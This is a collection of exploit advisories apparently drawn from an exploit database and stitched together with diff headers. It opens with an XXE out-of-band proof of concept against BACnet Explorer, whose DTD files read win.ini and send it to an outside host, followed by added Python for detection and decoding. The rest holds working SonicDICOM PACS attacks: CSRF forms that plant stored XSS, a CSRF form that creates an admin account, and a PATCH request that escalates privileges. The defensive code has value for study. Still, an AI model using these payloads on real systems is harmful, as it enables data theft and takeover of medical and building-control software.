Affected version: 4.0.0.0
Summary: The BACnet Explorer is a BACnet client application that
helps auto discover BACnet devices.
Desc: BACnetExplorer suffers from an XML External Entity (XXE)
vulnerability using the DTD parameter entities technique resulting
in disclosure and retrieval of arbitrary data on the affected node
via out-of-band (OOB) attack. The vulnerability is triggered when
input passed to the xml parser is not sanitized while parsing the
xml project file.
Tested on: Microsoft Windows NT 6.1.7601 Service Pack 1
mscorlib.dll: 4.0.30319.34209 built by: FX452RTMGDR
BACstac Library: 1.5.6116.0
BACstac Service: 6.8.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5398
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5398.php
30.01.2017
--
Open file evil.xml:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.71:8080/xxe.xml">
%remote;
%root;
%oob;]>
xxe.xml on the web server:
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.1.71:8080/?%payload;'> ">
python -m SimpleHTTPServer 8080
lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1 HTTP/1.1" 301 -
lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1/ HTTP/1.1" 200 -
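The chain above works in three steps: evil.xml pulls xxe.xml from the attacker's server as a parameter entity, xxe.xml reads win.ini into %payload and defines %oob whose SYSTEM URL embeds that content, and the parser's request for that URL is what SimpleHTTPServer logs. The following Python is an added example, not part of the advisory or of BACnet Explorer: it performs the pre-parse triage a fixed application would apply to an untrusted project file (any DOCTYPE, external entity declaration or parameter-entity reference is grounds for rejection) and decodes the logged callback back into the exfiltrated file. The XML and the log line are copied from the advisory; the benign project document used for comparison is constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed copies of the advisory's two files.
EVIL_XML = """<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.71:8080/xxe.xml">
%remote;
%root;
%oob;]>
"""

XXE_DTD = """<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.1.71:8080/?%payload;'> ">
"""

# The callback line SimpleHTTPServer logged in the advisory (the 301 one; the 200 line is
# the same request with a '/' appended by the server's redirect).
CALLBACK_LOG = ('lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll'
                '%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1'
                ' HTTP/1.1" 301 -')

_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.I)
_EXTERNAL_ENTITY = re.compile(r"<!ENTITY\s+(%\s*)?[\w.-]+\s+(SYSTEM|PUBLIC)\b", re.I)
_PE_REFERENCE = re.compile(r"%[\w.-]+;")


def dtd_risk(xml_text):
    """Pre-parse triage of an untrusted document or external DTD.
    A project file needs none of these constructs, so each one is a reason to reject."""
    return {
        "doctype": bool(_DOCTYPE.search(xml_text)),
        "external_entity": bool(_EXTERNAL_ENTITY.search(xml_text)),
        "parameter_entity_ref": bool(_PE_REFERENCE.search(xml_text)),
    }


def should_reject(xml_text):
    return any(dtd_risk(xml_text).values())


def decode_oob_callback(log_line):
    """Recover the exfiltrated file from the URL the victim's parser requested.
    The query string is the percent-encoded file; SimpleHTTPServer's 301 variant
    carries a trailing '/', hence the rstrip."""
    m = re.search(r'"GET (\S+) HTTP/', log_line)
    if not m:
        raise ValueError("no GET request in log line")
    query = urlsplit(m.group(1)).query
    return unquote(query.rstrip("/"))


if __name__ == "__main__":
    print("evil.xml:", dtd_risk(EVIL_XML))
    print("xxe.xml: ", dtd_risk(XXE_DTD))
    print(decode_oob_callback(CALLBACK_LOG))
```

The regex triage is a gate, not a parser, and belongs in front of whatever XML library the application uses. For a .NET client such as this one the library-level fix is to load project files with an XmlReaderSettings whose DtdProcessing is DtdProcessing.Prohibit and whose XmlResolver is null, which stops both the external DTD fetch and the file:// read regardless of what the triage missed. Note also that the exfiltrated content travels in the URL, so the technique is limited to files that fit in a request line and contain no characters that break the URL, which is why win.ini is the usual first target.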

platforms/windows/webapps/41309.html

@ -0,0 +1,78 @@
SonicDICOM PACS 2.3.2 Multiple Stored Cross-Site Scripting Vulnerabilities
Vendor: JIUN Corporation
Product web page: https://www.sonicdicom.com
Affected version: 2.3.2 and 2.3.1
Summary: SonicDICOM is PACS software that combines the capabilities of
DICOM Server with web browser based DICOM Viewer.
Desc: The application suffers from multiple stored XSS vulnerabilities.
Input passed to several API POST parameters is not properly sanitised
before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context
of an affected site.
Tested on: Microsoft-HTTPAPI/2.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5394
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5394.php
22.11.2016
--
CSRF Stored XSS via value parameter in settings API:
----------------------------------------------------
<html>
<body>
<form action="http://172.19.0.214/viewer/api/settings/add" method="POST">
<input type="hidden" name="id" value="testingus" />
<input type="hidden" name="key" value="viewer&#46;display&#46;overlay&#46;tl" />
<input type="hidden" name="value" value="&#123;"angle"&#58;&#123;"item&#95;name"&#58;"Angle"&#44;"display&#95;name"&#58;"&#92;"><script>alert&#40;1&#41;<&#47;script>"&#125;&#125;" />
<input type="submit" value="Request #1" />
</form>
</body>
</html>
CSRF Stored XSS via Name parameter in sendsettings API:
-------------------------------------------------------
<html>
<body>
<form action="http://172.19.0.214/viewer/api/sendsettings/create" method="POST">
<input type="hidden" name="Name" value=""><script>prompt&#40;2&#41;<&#47;script>" />
<input type="hidden" name="IPAddress" value="1&#46;1&#46;1&#46;1" />
<input type="hidden" name="Port" value="123" />
<input type="hidden" name="CalledAETitle" value="asd" />
<input type="hidden" name="CallingAETitle" value="dsa" />
<input type="submit" value="Request #2" />
</form>
</body>
</html>
CSRF Stored XSS via Name parameter in providers API:
----------------------------------------------------
<html>
<body>
<form action="http://172.19.0.214/viewer/api/providers/create" method="POST">
<input type="hidden" name="Name" value=""><script>confirm&#40;2&#41;<&#47;script>" />
<input type="hidden" name="Port" value="123" />
<input type="hidden" name="AETitle" value="ZSL" />
<input type="hidden" name="AllowAnonymousUsers" value="true" />
<input type="hidden" name="IsAnonymous" value="true" />
<input type="submit" value="Request #3" />
</form>
</body>
</html>

platforms/windows/webapps/41310.html

@ -0,0 +1,41 @@
SonicDICOM PACS 2.3.2 CSRF Add Admin Exploit
Vendor: JIUN Corporation
Product web page: https://www.sonicdicom.com
Affected version: 2.3.2 and 2.3.1
Summary: SonicDICOM is PACS software that combines the capabilities of
DICOM Server with web browser based DICOM Viewer.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: Microsoft-HTTPAPI/2.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5395
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5395.php
22.11.2016
--
<html>
<body>
<form action="http://172.19.0.214/viewer/api/accounts/create" method="POST">
<input type="hidden" name="Id" value="testingus" />
<input type="hidden" name="Name" value="Second Admin" />
<input type="hidden" name="Authority" value="1" />
<input type="hidden" name="Password" value="654321" />
<input type="submit" value="Request" />
</form>
</body>
</html>

platforms/windows/webapps/41311.txt

@ -0,0 +1,42 @@
SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit
Vendor: JIUN Corporation
Product web page: https://www.sonicdicom.com
Affected version: 2.3.2 and 2.3.1
Summary: SonicDICOM is PACS software that combines the capabilities of
DICOM Server with web browser based DICOM Viewer.
Desc: The application suffers from a privilege escalation vulnerability.
A normal user can elevate his/her privileges by sending an HTTP PATCH request
that sets the parameter 'Authority' to the integer value '1', gaining admin rights.
Tested on: Microsoft-HTTPAPI/2.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5396
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5396.php
22.11.2016
--
PATCH /viewer/api/accounts/update HTTP/1.1
Host: 172.19.0.214
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Escalation Browser/1.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: {REMOVED_FOR_BREVITY}
Connection: close
Id=testingus&Name=peend&Authority=1